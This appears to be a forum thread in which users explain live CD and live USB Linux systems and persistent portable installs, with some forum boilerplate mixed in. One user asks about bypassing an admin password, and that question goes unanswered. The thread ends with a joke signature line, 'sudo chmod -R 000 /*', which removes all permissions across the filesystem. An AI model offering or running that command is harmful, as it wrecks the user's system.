live cd/usb is basically a linux usb install disk that allows you to use the os but it gets wiped when removed

Portable os is when you use a live usb to install linux on another usb drive and that saves data

Please follow your topics guys, it's very important! CoC F.A.Q  Please use the corresponding PC part picker link for your country USA, UK, Canada, AustraliaSpain, Italy, New Zealand and Germany

also if you find anyone with this handle in games its most likely me so say hi

I take it you mean just sticking linux on a CD or USB. If that is what you mean then you can boot from it (I'm sure you know how to do that) and you can "trial" it. Meaning you can run the OS from the disk or drive. Then you can install it if you want to.

It allows you to test an OS without installing it to your hard drive. You can have windows installed and start running Linux without windows being deleted or the disk being partitioned. No trace of Linux will be left on your system if you choose not to install it as well.

Thx. I've also heard it can be used to get around an admin password, does this make it illegal/ voiding a warrenty of some sort?

A live cd is a disc that contains an installation of a linux distribution that can be booted to and tried before you install it (they allow installation too). Any changes you make in a live cd will obviously be lost when you reboot since you can't write to a cd, at least not without removing what's on it already.

A live pendrive is the same thing except you can save data to it and it can work as a full installation. It won't be very fast though.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
